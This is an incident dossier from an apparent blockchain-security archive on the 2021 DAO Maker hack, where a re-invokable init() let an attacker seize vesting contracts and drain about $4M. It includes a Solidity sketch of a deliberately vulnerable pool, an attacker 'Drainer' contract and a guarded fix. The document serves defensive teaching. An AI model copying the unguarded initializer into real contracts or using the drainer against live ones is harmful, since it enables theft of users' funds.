Est. MMXXVI · Vol. VI · № 273
Blockchain Breaches

An archive of cryptocurrency security incidents — hacks, exploits, bridge failures and rug pulls, documented with on-chain evidence.

Dossier № 054 · Smart Contract Bug

DAO Maker Unprotected Init

An unprotected init() function in DAO Maker's vesting contracts let an attacker seize ownership and call emergencyExit, draining $4M across multiple user pools.

Date: September 3, 2021
Victim: DAO Maker
Chain(s):
Status: funds laundered, no recovery reported
Funds Stolen: ~$4M

On September 3, 2021, the launchpad and token-distribution platform DAO Maker lost approximately $4 million, affecting about 5,251 users. An unprotected init() function on DAO Maker's distribution contracts let the attacker re-initialize already-deployed, funded contracts, seize ownership, and call an owner-only emergency-withdraw function to drain user funds.

What happened

DAO Maker ran token-sale and vesting infrastructure — users' allocated tokens and contributed funds were held in distribution contracts pending vesting schedules.

The fatal flaw was the canonical re-invokable-initializer bug: the distribution contract's init() function, which set the contract's owner and critical parameters, had neither an access check on who could call it nor a guard against being called a second time. Any address could therefore rewrite the owner of a live, funded contract.

The attack:

  1. Called init() on an already-deployed, funded distribution contract, passing parameters that set the attacker as the contract owner.
  2. With ownership seized, called the contract's emergencyExit / privileged withdrawal function — legitimately available to the owner — to transfer user funds out.
  3. Repeated across affected pools, draining approximately $4M.

Aftermath

  • DAO Maker acknowledged the breach and committed to compensating affected users from corporate reserves and treasury.
  • The compromised contracts were retired and replaced with properly-guarded versions.
  • The stolen funds were laundered; no recovery has been reported.

Why it matters

DAO Maker is one more entry in the re-invokable initializer lineage — the single most-repeated catastrophic Solidity pattern in the catalogue:

  • Parity Multisig (2017) — re-invokable initWallet, $30M stolen + $150M frozen.
  • DODO (Mar 2021) — re-invokable init() on Crowdpools.
  • Punk Protocol (Aug 2021) — re-invokable Initialize() via delegatecall.
  • DAO Maker (Sep 2021) — unprotected init(), ownership seizure.
  • Audius (2022) — re-invokable governance initializer.

Five-plus years of the exact same bug class, each instance costing millions, despite the mitigation being a single well-documented one-line modifier (OpenZeppelin's initializer). The recurrence is the lesson: knowing about a vulnerability class as an industry does not prevent individual teams from shipping it. Every new upgradeable contract, written by a team that may not have internalised the Parity/DODO/Punk history, is a fresh opportunity to omit the guard.
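The following Solidity sketch is an added illustration for this dossier; it is not DAO Maker's code nor that of any project in the lineage above. It shows the three attack steps listed under "What happened" and the one-line fix discussed here side by side: a vesting pool whose init() can be re-invoked, an attacker contract that re-initializes and drains it, and the same pool guarded with OpenZeppelin's initializer modifier. The contract names, the allocation mapping, and the Drainer contract are assumptions; the OpenZeppelin import paths are the real ones for the v5 packages.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not DAO Maker's contracts. Names, the allocation
// mapping and the Drainer contract are hypothetical.
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {Initializable} from "@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol";

/// A vesting pool with the defect described in this dossier: init() sets the
/// owner, but nothing stops anyone from calling it again on a funded pool.
contract VulnerableVestingPool {
    address public owner;
    IERC20 public token;
    mapping(address => uint256) public allocation;

    // Intended to run once after deployment (e.g. behind a clone or proxy),
    // but callable by any address, any number of times.
    function init(address _owner, IERC20 _token) external {
        owner = _owner;
        token = _token;
    }

    function deposit(uint256 amount) external {
        require(token.transferFrom(msg.sender, address(this), amount), "transfer failed");
        allocation[msg.sender] += amount;
    }

    // Privileged withdrawal. The owner check itself is correct; the defect is
    // that `owner` can be rewritten by anyone through init().
    function emergencyExit(address to) external {
        require(msg.sender == owner, "not owner");
        require(token.transfer(to, token.balanceOf(address(this))), "transfer failed");
    }
}

/// Hypothetical attacker contract reproducing the three steps: re-init to
/// seize ownership, call the owner-only drain, repeat over every pool.
contract Drainer {
    function attack(VulnerableVestingPool[] calldata pools) external {
        for (uint256 i = 0; i < pools.length; i++) {
            // Step 1: become owner. The pool's existing token address is read
            // back and passed through so the drain still targets real funds.
            pools[i].init(address(this), pools[i].token());
            // Step 2: the owner-only withdrawal now accepts this contract.
            pools[i].emergencyExit(msg.sender);
        }   // Step 3: next pool
    }
}

/// Hardened version. OpenZeppelin's `initializer` modifier records that
/// initialization has run and reverts on any later call, so ownership can be
/// assigned exactly once per instance.
contract GuardedVestingPool is Initializable {
    address public owner;
    IERC20 public token;
    mapping(address => uint256) public allocation;

    /// Locks the implementation contract itself so it cannot be initialized
    /// and taken over directly. Appropriate only when instances are deployed
    /// behind proxies or clones; a directly deployed contract should use a
    /// constructor instead of an init function in the first place.
    /// @custom:oz-upgrades-unsafe-allow constructor
    constructor() {
        _disableInitializers();
    }

    function initialize(address _owner, IERC20 _token) external initializer {
        require(_owner != address(0), "zero owner");
        owner = _owner;
        token = _token;
    }

    function deposit(uint256 amount) external {
        require(token.transferFrom(msg.sender, address(this), amount), "transfer failed");
        allocation[msg.sender] += amount;
    }

    function emergencyExit(address to) external {
        require(msg.sender == owner, "not owner");
        require(token.transfer(to, token.balanceOf(address(this))), "transfer failed");
    }
}
```

The check a reviewer wants is mechanical: every function that writes an owner or admin slot must be either a constructor or carry `initializer`, `reinitializer`, or an owner-only modifier, and the regression test for the guarded pool is a second `initialize` call that is expected to revert (in the v5 packages with the custom error `InvalidInitialization()`, in v4 with the string "Initializable: contract is already initialized"). Note that in the vulnerable pool `emergencyExit` is not the bug and would pass a review of its own lines; the bug only shows up when the reviewer asks who can write `owner`.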

DAO Maker is also notable for the user-count impact — ~5,251 affected users — illustrating that launchpad/distribution platforms concentrate many individual users' funds into shared contracts, so a single initializer bug becomes a many-thousand-victim event rather than a single-protocol-treasury loss. The blast radius of the bug class scales with how much user money the vulnerable contract custodies, and distribution platforms custody a lot.

Sources & on-chain evidence

  1. halborn.com: https://www.halborn.com/blog/post/explained-the-dao-maker-hack-september-2021
  2. newsweek.com: https://www.newsweek.com/dao-maker-hack-7m-stolen-defi-heist-1618785
  3. rekt.news: https://rekt.news/daomaker-rekt
